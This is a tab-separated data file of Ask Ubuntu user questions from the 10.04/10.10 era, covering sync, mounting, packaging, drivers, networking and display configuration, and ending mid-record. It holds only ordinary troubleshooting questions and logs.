19067	does the ubuntu one sync work ?	i have been on this for several hours now , trying to get a simple second folder to sync with my ( paid ) account . i can not tell you how many times i removed all devices , removed stored passwords , killed all processes of u1 , logged out and back in online ... and still , the tick in the file browser ( synchronize this folder ) is loading and loading and loading . also , i have logged out , rebooted countless times . and this is after me somehow managing to get the u1 preferences to finally `` connect '' again . i have also checked the status of your services , and none are close to what i am experiencing . and i have checked the suggested related questions above ! so please , just confirm whether it is a problem on my side , or a problem on your side . edit : in the mean time , here is what has changed , on top of what is mentioned just above . • my files went from 0mb to 71.9mb , and is still rising . • my first folder of 400.2mb is being filled with the data as i write this . the second folder has the folder sub-structure in place . • both folders now show in the file browser that it will be synchronized . i believe that right now , it is all back to normal and working fine , and i guess that 's what a good night 's sleep can do ; ) . and we 're now only back to the point where synchronizing is slow , but will pick up with the release of natty ( https : //wiki.ubuntu.com/ubuntuone/faq/whyisittakingsolongformyfilestosync ) . but to get to the questions : my about says i use 11.04 , natty narwhal , but i am quite sure the last distribution i installed was 10.10 . folder a is 400.2mb , and folder b is 29.5mb i am on a dsl line , behind a regular fritz.box setting . no proxy servers in use , and i did not install any particular firewall features . no physical firewall , just the router ( on which i have a tv signal as well ) , and 2 switches to get to this floor . status : inactive the ubuntuone-indicator runs the same window as when i click on my name on the top-right corner and select ubuntu one , or in the control center choose ubuntu one . it was n't supposed to go further than this was it ?
19069	error mounting : mount exited with exit code 13	i keep a windows partition on my laptop for the occaisional bit of photoshop work . a while ago i noticed that windows had disappeared from my grub boot menu and when i try to mount the windows partion , my system hangs for a bit and then i get this : unable to mount 105 gb filesystem error mounting : mount exited with exit code 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to calculate free mft records : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . it seems that chkdsk is a windows command but since i ca n't boot into windows ( since its the windows partition that is the problem ) i 'm not sure what to do . here is the output of fdisk to give you the lay of the land : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x98000000 device boot start end blocks id system /dev/sda1 1 10199 81923436 83 linux /dev/sda2 * 10200 22947 102398310 7 hpfs/ntfs /dev/sda3 22948 29164 49938052+ 83 linux /dev/sda4 29165 30401 9936202+ 5 extended /dev/sda5 29165 30401 9936171 82 linux swap / solaris any guidance would be appreciated !
19070	how to create and maintain patch on debian package ?	i want to patch on trac package . i know how to patch and rebuild the package , but there are some things i do n't understand very well . my patch is something dangerous and not likely to commit back to the community . so , let me just say , it 's a very private patch . but , i want my patch keep working when the ubuntu packages upgrade . ( should i apt-get source trac and move my patch to the new version of source directory each time the trac upgrades ? ) i see there is a patch/ directory ( many using quilt i guess ) in debian/ , but i do n't know how to use it ? will debuild automatic apply all patches in the patch/ directory ? and what about dpkg-buildpackage ? is there some environ variables to control the selection of patches to apply ?
19074	how can i make a command run once the next time i log in ?	how can i schedule a command to run the next time i log in ? i do n't want it to run every time , just once .
19078	what version of syslog does ubuntu 10.04.1 install default ?	i am planning a rsyslog deployment for my department using ubuntu 10.04.1 - i can not seem to find which version of syslog ubuntu installs by default in the documentation , syslog-ng , sysklogd , old syslogd , or rsyslog ?
19085	synchronizing ( updating ) published files	how can i update a published file and maintain the same url ? after saving an update of a published file on my desktop , it will automatically `` synchronise '' with the corresponding files at ubuntuone ( and it does ) . problem is that the `` new file '' , actually the updated file with the same name , is no longer published . pressing the publish button results is a new url . i now have to mail new url 's and change embedded links , as old url will result in a failure to find the updated file ( or indeed any file ) . i am not sure if it is a bug or a design flaw ( maybe intentional ? ) , but it seems strange to me .
19089	how do you limit root partition disk access to allow drive to go into standby mode ?	when there are no users on my system , i would like the hard disk to spindown to low-power state . i realize that this might not be 100 % achievable for a straight 24 hours , but it seems reasonable that the system could remain idle for a few hours at a time when it is not in use . my system is headless and running a limited number of services . the primary services are : exim4 , mythtv-backend , nfs , samba , cups , apt-cacher-ng assume that drives are already enabled to go into standby mode . also , its not acceptable to increase the write-back timeout , since my system is not on a ups .
19095	video stabilisation software	is there any way , either through a graphical program or a command line utility to `` stabilise '' video in ubuntu ? by stabilise i am referring mainly to a feature of imovie where shaky video is analysed , and then frame by frame altered to make it look smoother . this method looses video quality through zooming and rotating to produce the effect . look at this video for an example of what i mean .
19100	dovecot service stopped	i am running on ubuntu 10.10 . my problem is ; dovecot service automatically stops . how to get rid of this problem ? here is the line from the dovecot log . dovecot : dovecot : fatal : time just moved backwards by 17 seconds . this might cause a lot of problems , so i 'll just kill myself now . http : //wiki.dovecot.org/timemovedbackwards : 1 time ( s ) thanks in advance .
19103	how would i change the date format in empathy ?	how do i change the date format in empathy 2.32.1 ? the default format is along the lines of : 28/12/10 19:11:06 which is huge in a chat winodw , i 'm just after a simple time display if i can .
19105	pptp vpn connection with dd-wrt terminates	i have problems with connection to dd-wrt router with pptp server installed . win7 has no problems with connection to it . but in ubuntu i 'm getting all the time : dec 28 21:52:14 it-nb pppd [ 4209 ] : plugin /usr/lib/pppd/2.4.5//nm-pptp-pppd-plugin.so loaded . dec 28 21:52:14 it-nb pppd [ 4209 ] : pppd 2.4.5 started by root , uid 0 dec 28 21:52:14 it-nb pppd [ 4209 ] : using interface ppp0 dec 28 21:52:14 it-nb pppd [ 4209 ] : connect : ppp0 < -- > /dev/pts/2 dec 28 21:52:18 it-nb pppd [ 4209 ] : connection terminated . dec 28 21:52:18 it-nb pppd [ 4209 ] : exit .
19107	how can i start rhythmbox minimized ?	does anyone know how to start rhythmbox in quiet mode ?
19108	what is better ubuntu tweak or software center ?	ubuntu tweak has served me very well over the past few release cycles , but there seems to be more and more of an overlap between ubuntu tweak and the ubuntu software center . i wanted to know whether these two great apps are headed for a head-to-head crash ( which would be a shame for the ubuntu community ) or is there some way for the two projects to complement each other , integrate and make my favorite distribution even better ? happy new year to everyone .
19111	laptop screen does not turn on after sleep	i recently put ubuntu 10.10 on my laptop and after fixing the wireless problem i am only stuck on my screen turning back on after sleep . i have had this problem since ubuntu 7 . i tried using ubuntu way back then and had a whole bunch of issues with the sleep and the wireless ( broadcom 4311 ) . anyways , i have an ati radeon express 200m graphics card ( old laptop ) . when i go to hardware drivers it does n't give me any options to use the closed source drivers . any suggestions on what i should do ? i am going to try what is suggested in this thread but i am at work right now . laptop does not wake up after sleep thanks in advance for any help .
19117	how to mount an internal hdd on start-up ?	i have a 500gb internal hdd where i store all my music and photos but it is annoying to manually mount it after a restart and i was wondering how to mount it automatically and make it available to rhythimbox for playback . thanks !
19119	more than 2gb of music without paid plan possible ?	i do not have a paid plan for ubuntuone and do not intend of buying one , but i do like to buy music from the ubuntuone music store . is it possible to buy music , once i bought more than 2gb or would i have to move the music out of the ubuntuone share ? in this case , i would suggest to put the music in the official ubuntuone-folder instead of a hidden one . non-technical users will not understand , why their shared music files are not in this folder , but others are popping up there ( e.g . in the webinterface ) . best regards , lars
19126	how to install hedgewars 0.9.15 ?	the new year is near and new version of hedgewars was realased . link for download there is packages for microsoft windows and mac os x but no for ubuntu , like .deb . i just want to ask how to install it on ubuntu . there is source code available . thanks in advance !
19127	how to access phpmyadmin after installation ?	i 've installed phpmyadmin sudo apt-get install phpmyadmin . of course , i have also mysql and a web server running properly . now how can i reach it ?
19131	awn displaying window icons even when display launchers only selected	i 'm using awn with the dockbarx applet.i have display launchers only checked in the awn dock properties , but i 'm still getting window icons displaying for certain apps when they 're open . any ideas ? here 's a screenshot , note the firefox icon at the top of the bar ( shaded icon ) which is part of the dockbarx applet , then note it displaying again at the bottom of the bar ( indicating an open window . ) you can see from the launchers list in the dock properties that it is n't in fact a launcher . ( the yahoo and gmail launchers are standalone prism apps , they do n't use the ff prism extension . and if i mouse over the bottom ff icon , it does display the title of the open firefox window , not anything using prism . ) any ideas ?
19133	files lost after reboot in windows	i have a dual boot os ( ubuntu 10.10 and windows 7 ) in my laptop . i recently copied some important files from a pen drive to one of my ntfs drives from ubuntu . after copying i was able to view the files in the directory and hence i formatted the pen drive . the problem occurred when i rebooted the system in windows , i could not find any of the files or the folders i copied in the drive . i again rebooted into ubuntu and could not find it there also . what is the reason my files got deleted ? is there any way to recover them ? note : for your information my windows was in hibernation state when i was copying the files in ubuntu . will this affect the files in any manner ?
19135	built-in ethernet card is not detected	i have ubuntu 10.04 installed on a desktop computer with an msi ms-7142 motherboard . both when i was testing and after i installed , it ca n't find any network card . there is a built-in card , but lspci does n't show any network card . i have n't yet tossed an external pci card in to check and see if it can find that , but i was curious to know if there are any ideas ? thanks !
19136	hide the gnome-panel on one of the workspaces	i 'm currently using 2 workspaces on ubuntu 10.10 , and compiz . is it possible to completely remove the gnome panel from one of the workspaces ? i 'd like to have a clean desktop to work with on the second workspace , and a regular desktop with panels on the first workspace . is that at all possible ?
19137	how to prevent wireless network asking password when briefly out of range	when i 'm connected to a wireless network from quite far away i sometimes briefly lose the connection . then network manager prompts me to re-confirm the password as if it suspected that was the problem that caused the loss of connection ( the password is already filled in in the dialog box ) . is this normal behaviour ? can i prevent it from happening and have network manager automatically reconnect without the password dialog box when the wireless network comes back into range ? i 'm using 10.04 ( 32bit , gnome ) on an acer aspire one .
19138	what 's the official name for that area on the top of the screen ?	what 's the official name for that area on the top of the screen , similar to the mac menu bar , where you see icons representing running apps ?
19145	which large file system format to use for usb flash drive compatible with ubuntu/mac/windows ?	i 've had this problem for a long time and ca n't find a solution . i switch between the 3 oses all the time and use a 1tb usb drive to do so . i ca n't seem to find a format that is compatible across all systems that handles large files ( at least 8-9 gb ) . does anyone have a solution for this ? recently i 've tried exfat but that messes up the filesystem when trying to read on windows after adding files from ubuntu ( using the fuse driver ) . the oses currently i 'm using are windows vista/7 , mac os x ( 10.6.5 ) and ubuntu 10.10 update : i 've decided to go with ntfs for now . the download for ntfs-3g for mac can be found here .
19146	why ca n't i install 10.04 on a system that already has 8.04 ?	ubuntu 10.04 is beautiful . i love it . i am dying to install it on my pc , alongside the existing ubuntu 8.04 ( from which i write this message right now ) . but ... it wo n't let me ! when i reach the partitioning stage ( manual ! ) ubuntu 10.04 sees my two hdds as one raid volume . it does n't see all the partitions i already have in place in /dev/sda and /dev/sdb . even windows 7 does n't behave like this ... ( yes , i actually managed to install windows 7 64-bit in dual-boot configuration with ubuntu 8.04 on this same system ) . note : gparted on ubuntu 10.04 ( live cd ) sees the partition intended for ubuntu 10.04 ( /dev/sda4 ) perfectly , but is unable to format it . note : i also removed that partition trying to reformat it via gparted once 10.04 livecd is loaded . it did n't help . i believe that the problem lies in ubuntu `` deciding for me '' that the hdds should be `` seen '' as a raid , hence any partition is seen by gparted as `` busy '' or `` locked '' . any idea how to solve this problem ?
19151	how to upload a qmake-based package to my ppa ?	i have an application that uses qmake that i 'd like to upload to my ppa . how can i set up the package so that the project builds properly ?
19154	closer aero-snap in ubuntu	before i get screamed at for duplicating a question . ive read windows 7-like snap window maximize and vertical feature and http : //www.omgubuntu.co.uk/2009/11/get-aero-snap-in-ubuntu/ there are two problems with this solution that i am trying to get around . it 's not sensitive to dragging a window it 's not intelligent for twin-view monitors . the first problem is the more pressing . i have the compiz settings with wmctrl , but this is not sensitive to dragging windows if i have a window with the focus and place my mouse in the panel i get the window maximized , even though i 'm not dragging the window . a good solution would be sensitive to the state of the mouse , clicked , right clicked , middle clicked . an ideal solution would be sensitive to dragging a window or not . second is a minor annoyance to me at least . with the commands as they are listed are equivalent to maximizing the windows since i have a twinview monitors setup . is there any way to add these sensitivities to the commands ?
19155	install haskell ( hugs ) - package not found	i have problems with installing haskell ( hugs ) on ubuntu 10.10 . i had the latest version before and i wrote just sudo apt-get install hugs and everything worked . but now with ubuntu 10.10 it tells me that package hugs could not be found . how can i install hugs then ?
19158	files inside alias folder not accessible	in my apache2.conf i have an alias setup like this : alias /cake/ /var/www-cake/repo < directory /var/www-cake/repo > order allow , deny allow from all allowoverride all options +indexes < /directory > inside the /var/www-cake/repo directory i just have 1 file that is index.php when i go to http : //linux-server/cake/ i get a directory listing that shoes the index.php file . when i click on the file it takes me to http : //linux-server/cake/index.php in which i get a 404 page not found error . what do i need to do to make the files accessible ?
19160	what is the quickest way to indent a block of text with spaces for use within a web browser ?	i occasionally have the need to indent a block of text with spaces for use within a web browser , for example , when formatting a code block on this site or in a post on launchpad . so far i 've just done it by hand by copying four spaces to the clipboard and then mashing keys really fast : â , home , ctrl+v ( repeat ) what is the quickest way to accomplish this ? copying and pasting to another program ? ( which ? ) a firefox or chrome browser extension ? a command to directly modify the clipboard contents ? an auto-typing program ?
19162	app to use with geotagged photos ? ( gps info in exif )	dad got a camera with built in gps . the gps info is embeded in the exif data , i guess . picasa 3 puts a small `` icon '' on each of the geotagged photos , but can not do anything with them ( as far as i can tell ) . is there any photo manager or mapping tool that can put these pictures on a map and/or let him browse trough the photos based on location ?
19163	how do i use haskell ( hugs ) ?	hey ! i have installed hugs on ubuntu 10.10 but now i have the problem how to run it . before , i mean in later versions of ubuntu i typed just sudo run hugs and it worked . now it doesnt work . how should i run hugs in ubuntu 10.10 ? thanks
19170	bisig ppa causing 404 error ?	i need default source list for ubuntu 10.04 . can anybody help me ? here is mine : -- - # ubuntu supported packages deb http : //archive.ubuntu.com/ubuntu/ lucid main restricted multiverse universe deb http : //archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu/ lucid-updates main restricted multiverse universe deb http : //security.ubuntu.com/ubuntu lucid-security main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu lucid-proposed main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu/ lucid main restricted multiverse universe deb-src http : //archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu/ lucid-updates main restricted multiverse universe deb-src http : //security.ubuntu.com/ubuntu lucid-security main restricted universe multiverse deb-src http : //security.ubuntu.com/ubuntu lucid-proposed main restricted universe multiverse # canonical commercial repository deb http : //archive.canonical.com/ubuntu lucid partner deb http : //archive.canonical.com/ubuntu lucid-backports partner deb http : //archive.canonical.com/ubuntu lucid-updates partner deb http : //archive.canonical.com/ubuntu lucid-security partner deb http : //archive.canonical.com/ubuntu lucid-proposed partner deb-src http : //archive.canonical.com/ubuntu lucid partner deb-src http : //archive.canonical.com/ubuntu lucid-backports partner deb-src http : //archive.canonical.com/ubuntu lucid-updates partner deb-src http : //archive.canonical.com/ubuntu lucid-security partner deb-src http : //archive.canonical.com/ubuntu lucid-proposed partner # medibuntu deb http : //packages.medibuntu.org/ lucid free non-free deb-src http : //packages.medibuntu.org/ lucid free non-free # playonlinux deb http : //deb.playonlinux.com/ lucid main # opera deb http : //deb.opera.com/opera/ lenny non-free # google deb http : //dl.google.com/linux/deb/ stable non-free main # dropbox official source deb http : //linux.dropbox.com/ubuntu karmic main # skype deb http : //download.skype.com/linux/repos/debian/ stable non-free this is the error i am getting : -- ( sudo apt-get update ) get:9 http : //dl.google.com stable/main packages [ 1,076b ] err http : //ppa.launchpad.net lucid/main packages 404 not found get:10 http : //dl.google.com stable/main packages [ 735b ] and finally : -- fetched 9,724b in 3s ( 2,645b/s ) w : failed to fetch http : //ppa.launchpad.net/bisig/ppa/ubuntu/dists/lucid/main/binary-i386/packages.gz 404 not found e : some index files failed to download , they have been ignored , or old ones used instead .
19171	slow wireless reconnect after suspend	i a broadcom 4312 using the sta drivers , i reinstalled ubuntu because the b43 drivers were giving me a huge hassle along with some weird kernel issues . my wireless speed is fine , everything works well , except upon restart of computer and after taking the computer out of suspend . it takes about 30-45 seconds for the wireless to reconnect , and i think it is a driver issue ( i clicked on the network manager at the top and for about 30 seconds there are no wireless networks listed . ) i tried this advice already : http : //lilserenity.wordpress.com/2007/10/31/fix-ubuntu-dropping-wireless-on-suspendhibernate-resume/ which basically says to change this : stop_services= '' '' to stop_services= '' networking '' in the file /etc/default/acpi-support this did not help anything . something to note is that the issue does not occur when i am logging back in after already logging in once and logging out .
19176	upgrade from 10.04 to 10.10 on netbook : now or later ?	i began with installing 9.04 in a netbook ( asus eeepc 1000h ) , upgraded to 9.10 and have now lucid lynx 10.04 ( lts ) . most things tested run pretty good , with the most notable exception being wireless network due to the hardware ( ralink rt2860 ) which i first tested after the last major upgrade and a few times before giving up ( failed to maintain connection to wpa2 networks ) . other nuisances are not as important ( e.g . some hotkeys work , a couple of them do n't ) , but given that most everything works i 'm concerned with doing an upgrade to find most things have been broken and i have to go back and dig up on how to get it to work ... once in a while , i look up for some posts elsewhere to read up on problems and to find out if they 're tame enough to justify an upgrade to 10.10 . i 'm not in a rush , but i 'm not interested in being too left behind some time from now that an upgrade becomes too costly or downright impossible ( many things formatted too differently ) . i 'm not even sure if it 's possible to `` easily '' upgrade from lts to lts release ... therefore i ask if it 's ( in principle ) possible to skip releases and only do a major upgrade much later on . for example , is it possible ( or advisable ) to do an upgrade only when the next lts comes out ( a couple of years from now ) ? or is it preferable not to skip releases at all ?
19178	easily create slideshow ?	does anyone know of an app that lets you drag and drop images to create a slideshow ? not to create a dvd or video , but a slideshow you can control yourself . office presentation tools is too complicated . it is also important that i can bring the slideshow with me easily from one machine to another .
19180	mp3 files cut off in the ubuntu one android app	i noticed today on my phone ( droid x running android 2.2.1 ) that when streaming the ubuntu one app would skip to the next song before the previous one had finished . looking into it , one of the mp3s downloaded from the server was only 2.5mb instead of 4.2mb as it shows on the server itself via one.ubuntu.com . it 's happened with multiple tracks today ( i remember it happening once the first time i used the app too but shrugged it off as a glitch ) . the app itself shows a star on the playlist item indicating the file was downloaded even though it was apparently cut off for some reason , perhaps lack of good cell coverage , or some sort of dropped connection . it seems like the latter may be happening and instead of showing an error or retrying it just stops and shows the download is complete .
19185	how to install revolution r enterprise , an rpm , when alien fails ?	revolution r enterprise is available as a red-hat rpm file . normally i would use alien to install an rpm file as explained in another more generic question about installing rpms , but the instructions for installing this package have an install.py file that i am supposed to execute . when i ./install.py , i get the following instructions : rpm : please use alien to install rpm packages on debian , if you are really sure use -- force-debian switch . see readme.debian for more details . there is no readme.debian file in the directory , and although i am not proficient in python , i can tell that there are at least four different directories with *rpm files in them . has anyone had success with this ? if possible , i 'd prefer to install the enterprise version instead of community version in the ubuntu repository so that i can test it out .
19192	what is the default file system of /var/run , /var/lock	trying to figure out if my /var/run is using disk or not . see the command output : $ df -h filesystem size used avail use % mounted on /dev/mapper/vg0-root 40g 15g 26g 36 % / none 3.9g 340k 3.9g 1 % /dev none 3.9g 1.1m 3.9g 1 % /dev/shm tmpfs 3.9g 600k 3.9g 1 % /tmp none 3.9g 452k 3.9g 1 % /var/run none 3.9g 0 3.9g 0 % /var/lock none 3.9g 0 3.9g 0 % /lib/init/rw /dev/md0 236m 59m 165m 27 % /boot /dev/mapper/vg0-home 60g 58g 2.3g 97 % /home
19196	ca n't locate enemy-territory in terminal ?	i have an issue trying to install true combat : elite . i followed these steps , but when i do the 4th step , i get this : e : unable to locate package enemy-territory can anyone help ? thanks .
19199	how to change a particular path from the environment variable path ?	i incorrectly declared a variable , and now it has two forward slashes in it . how do i unset/correct it ? path= ... ols-1.3-62308//bin : /bin thanks .
19202	mouse and keyboard freeze	i installed ubuntu 10.10 today and have had mouse problem since . symptoms : at some arbitrary point in time ( frequency : 2-3 times per hour ) , the mouse and keyboard stops working for ever ( may be ) . i start system monitor , i found out network was shutdown just before mouse freeze . some time my keyboard keep typing one key . for example:77777777777777777777777777777777777777777777777777777 ... .. ( it keep typing for > 20 sec ) i found out a script just solve the freeze problem : ( i hit powerbutton ) -- -- -- -- -- -- -- -- -/etc/acpi/powerbtn.sh -- -- -- -- -- -- -- -- -- -- -- -- event=button [ / ] power action=/usr/sbin/fix_mouse.sh -- -- -- -- -- -- -- -- -/usr/sbin/fix_mouse.sh -- -- -- -- -- -- -- -- -- -- -- -- rmmod psmouse modprobe psmouse yesterday i install ubuntu 10.04 failed also have mouse problem . when i switch back to windows xp . the network card is down . it kept connecting and disconnecting 1 time per sec . cpu : i5 motherboard : asus p7p55d os : windows xp + ubuntu 10.10 video card : ati 5770 mouse , keyboard : ps/2 edit : i bought usb keyboard/mouse , and it works nicely .
19203	ca n't upgrade or install software after installing firefox 4	recently i installed ff 4 by command line following error seen e : type tu-mozilla-daily/ppa/ubuntu is not known on line 2 in source list /etc/apt/sources.list.d/ubuntu-mozilla-daily-ppa-maverick.list due to which neither update manager nor synaptic package manager are working
19206	how to compile the source code for gnu typist ?	i am new ubuntu user and try to install gnu typist . i need to compile the source code to run the app . according to documentation i need c compiler to compile the source code . i do n't have idea how to compile the source code and start using the app on ubuntu/linux . please help me to migrate on ubuntu/linux from windows ?
19212	how do i know if my system is capable of playing 24bit/96khz sound ?	let me state for the record that i 'm a total noob when it comes to hi-fi sound systems , but i am rather picky about the sound quality . normally i listen to cd recordings ripped to flac in 16/44 , but i have several albums that are also ripped from vinyls to flac in 24/96 . but it seems that i ca n't tell the difference between 16-bit and 24-bit versions ( except for some vinyl noises , of course ) . that can be due to several reasons : my equipment ( onboard audio , monitor headphones ) is n't good enough to make any difference , my system is not playing audio in 24-bit 96 khz , i am physically unable to hear the difference . so here is my question , how do i tell if my system can play 24-bit sound with 96 or 192 khz resolution ? and if it can , how do i tell that it plays it instead of downsampling to 16-bit / 44 khz ? also , what hardware ( audio cards , amplifiers , etc . ) would you recommend to play such recordings on ubuntu ?
19214	the best choice of linux file system and software that can be accesed from windows	i am curently having ubuntu and win 7 dual boot and i want to delete my windows 7 and format all my partitions to use a linux file system . but i want to leave a door open in case i have any problems with linux , to be able to acces my linux file system with windows . i know that there are programs that can give you read-write acces to a ext2/3/4 fs ( i tested none ) . i need advice in choosing the right fs , what are the diferences between ext 2/3/4 and what is the best software to do that .
19216	is init.d `` safe '' enough to use or should i use `runit` or `daemontools` on a server	i am looking to deploy my application on a server on which i would have no access in the future . i would like to have an indication of start-up errors generated by my program in particular and the system in general . i have never used any of those supervision tools and wonder what added value those would bring in ? is relying on the debian/ubuntu built-in init scheme not a good idea ?
19219	different methods to secure eject removable usb drive ?	to secure unmount a usbdrive i use the eject button next to the drive-icon in nautilus before i plug it from the usb jack . but not always nautilus is in use and sometimes i have to start extra it for this purpose . which other different methods exist to quick secure unmount ( eject ) a removable usbdrive ?
19220	what 's source/binary overrides in debian packaging ?	when i dput -f myhost foobar_x.x.x.changes , it successful uploaded the package , but produced the following warnings : foobar has no source override entry foobar has no binary override entry either how can i specify the source/binary overrides , and/or just suppress the warnings ? i 'm using mini-dinstall as the backend aptitude repository manager .
19224	how can i get the original contents of applications.menu and settings.menu ?	i just want to know the exactly original content of these two files : ~/.config/menus/applications.menu and ~/.config/menus/settings.menu . mine were changed after some alacarte testing and now i want to revert all the changes as in the original state . thank you . : )
19230	microsoft onenote alternative ?	is there any program for linux that has about the same functionality and usability as microsoft onenote ? at the moment i am checking out basket ( for kde ) , that seems to point to the right direction , but still lacks much of the functionality of onenote and is very buggy unfortunately . for those of you that do n't know what onenote is , here is the first paragraph from the wikipedia entry : microsoft onenote ( formerly called microsoft office onenote ) is a computer program for free-form information gathering and multi-user collaboration . it can gather user's notes ( handwritten or typed ) , drawings , and audio commentaries and share them with other users of microsoft onenote over the internet . the desktop version of onenote is available for the microsoft windows platform .
19234	should i choose 10.04 lts or 10.10 ?	i 'm new to ubuntu ( and linux ) but i want to give it a go . i 've spent a few evenings trying to get 10.10 to run but i think my nvidia 8400 gs is causing trouble ; only recovery mode with failsafex gets me to the desktop ( low-res but seems to be fully functional otherwise ) . given that the xx.04 vesions are long-term support , i 'm wondering whether it would be smarter for me to use that . i do n't need to be on the cutting edge - i prefer to have a system that just works , long-term . later i hope to move my media center and wife 's netbook over too . question : why should i ( not ? ) choose the 10.04 lts version over the newest 10.10 version ?
19243	wireless internet security	i have just installed ubuntu 10.10 ( dual booted with windows 7 ) on a laptop which will connect to the internet through a wireless internet connection and i want to ensure that this is secure . i have installed gufw and enabled the ufw firewall and set incoming to deny . what else can i do to secure this laptop ?
19245	why is this by passing the sudo password ?	i have a bash script i am using to automate a svn checkout . the contents of the file were : # ! /bin/bash cd /var/www-cake sudo svn checkout file : ///usr/local/svn/bash_repo/repo/ then when i double click the file it would ask me what to do , i would click the button `` run in terminal '' and then a terminal would pop up and ask me for the sudo password . i would enter it , the script would execute and the terminal would close . i wanted to give some sort of indication that the script ran successfully so i edited my file to look like : # ! /bin/bash cd /var/www-cake sudo svn checkout file : ///usr/local/svn/bash_repo/repo/ echo `` head revision has been pushed to live server '' i expected the terminal to now stay open and tell me the message afterwards . to my surprise it now opens and immediately closes . the script does execute and i no longer have to put in the sudo password . is this right ? i do not understand why this is happening , seems like a security issue .
19250	is there an app which links memo-notes to a window , based on the window 's title ?	nautilus has its notes-for-files tomboy has it 's notes for linking-ideas the screen itself has its sticky notes is there an app for jotting down notes for a particular window ? ... probably based on the window 's title , and displayed via shortcut key..
19251	online photo gallery for ubuntu one ?	i backup my photos in the cloud using ubuntu one . i would like to view them in an online gallery in a browser ( like dropbox , which has a `` photos '' folder ) . is this possible ?
19260	radeon display driver clones monitors while using xinerama	i 'm trying to get my two radeon hd 4770 cards working with three monitors . xinerama works so far in the way that i have two fully working monitors were i can move windows from one to the other . my problem now is that my third monitor is a clone of my second monitor ( displaying the exact same thing ) . these monitors are connected to the same graphic card ( `` screen middle '' and `` screen right '' in the xorg.conf below ) . here is my xorg.conf : section `` serverlayout '' identifier `` threemonitors '' screen `` screen left '' 0 0 screen `` screen middle '' rightof `` screen left '' screen `` screen right '' rightof `` screen middle '' option `` xinerama '' endsection section `` monitor '' identifier `` monitor left '' option `` dpms '' endsection section `` monitor '' identifier `` monitor middle '' option `` dpms '' endsection section `` monitor '' identifier `` monitor right '' option `` dpms '' endsection section `` device '' identifier `` device left '' driver `` radeon '' vendorname `` ati technologies inc '' boardname `` ati radeon hd 4770 [ rv740 ] '' busid `` pci:3:0:0 '' screen 0 endsection section `` screen '' identifier `` screen left '' device `` device left '' monitor `` monitor left '' subsection `` display '' depth 24 endsubsection endsection section `` device '' identifier `` device middle '' driver `` radeon '' vendorname `` ati technologies inc '' boardname `` ati radeon hd 4770 [ rv740 ] '' busid `` pci:2:0:0 '' screen 0 endsection section `` screen '' identifier `` screen middle '' device `` device middle '' monitor `` monitor middle '' subsection `` display '' depth 24 endsubsection endsection section `` device '' identifier `` device right '' driver `` radeon '' vendorname `` ati technologies inc '' boardname `` ati radeon hd 4770 [ rv740 ] '' busid `` pci:2:0:1 '' screen 1 endsection section `` screen '' identifier `` screen right '' device `` device right '' monitor `` monitor right '' subsection `` display '' depth 24 endsubsection endsection i 'm using a fresh kubuntu 10.10 installation with propsed-updates enabled since this repo contains a xorg fix for using multiple graphic cards . i hope someone can help me out . very many thanks ! !
19268	how to upgrade virtualbox to the latest version ?	i am currently using virtualbox 3.2 . i would like to upgrade it to latest version without losing any operating systems in it . how can i achieve this ?
19271	kmenu & shell script	i 'm trying to make a very small shell script with a simple command and add it up to the kmenu . well , thing is that once it launches the shell script , it closes it fast and i want to leave it open because the shell script attempts to create run a web application using a framework . i tried with this first # ! /bin/bash play run /home/david/projects/zs then i tried with this # ! /bin/bash konsole -e play run /home/david/projects/zs in terminal , it runs perfectly , but in launcher.. not so much any solution or suggestion is appreciated , thanks
19272	can not access modem configuration page	when i type my modem configuration page ip in browser instead of showing configuration page it shows default web page for apache.what 's wrong ? is there any ip conflict ? thanks in advance
19277	how do you install a usb cd rom drive ?	i recently purchased a usb cd rom drive , but i do n't know how to get it to work with my computer which runs ubuntu 10.04. http : //www.amazon.com/gp/product/b00303h908/ref=oss_product when i issue the lsusb command , it shows up as : bus 002 device 016 : id 05e3:0701 genesys logic , inc. usb 2.0 ide adapter the computer does n't recognize it automatically . how can i get this drive to show up as an actual drive on my computer ? if this particular drive ca n't handle linux , can you recommended one which can and provide a link to it so i can purchase it ? thanks ! update : i was asked by scaine to run a command and report back with the output : joe @ joe-laptop : ~ $ tail -f /var/log/kern.log dec 29 12:51:35 joe-laptop kernel : [ 103190.551437 ] sr 7:0:0:0 : [ sr1 ] add . sense : illegal mode for this track dec 29 12:51:35 joe-laptop kernel : [ 103190.551446 ] sr 7:0:0:0 : [ sr1 ] cdb : read ( 10 ) : 28 00 00 00 00 00 00 00 02 00 dec 29 12:51:35 joe-laptop kernel : [ 103190.551463 ] end_request : i/o error , dev sr1 , sector 0 dec 29 12:51:35 joe-laptop kernel : [ 103190.877542 ] sr 7:0:0:0 : [ sr1 ] result : hostbyte=did_ok driverbyte=driver_sense dec 29 12:51:35 joe-laptop kernel : [ 103190.877551 ] sr 7:0:0:0 : [ sr1 ] sense key : illegal request [ current ] dec 29 12:51:35 joe-laptop kernel : [ 103190.877559 ] info fld=0x0 , ili dec 29 12:51:35 joe-laptop kernel : [ 103190.877562 ] sr 7:0:0:0 : [ sr1 ] add . sense : illegal mode for this track dec 29 12:51:35 joe-laptop kernel : [ 103190.877572 ] sr 7:0:0:0 : [ sr1 ] cdb : read ( 10 ) : 28 00 00 00 00 00 00 00 02 00 dec 29 12:51:35 joe-laptop kernel : [ 103190.877588 ] end_request : i/o error , dev sr1 , sector 0 dec 29 13:08:46 joe-laptop kernel : [ 104221.558911 ] usb 2-2.2 : usb disconnect , address 16 then when i plugged the drive back into the computer , i got : dec 29 13:10:29 joe-laptop kernel : [ 104324.668320 ] usb 2-2.2 : new high speed usb device using ehci_hcd and address 17 dec 29 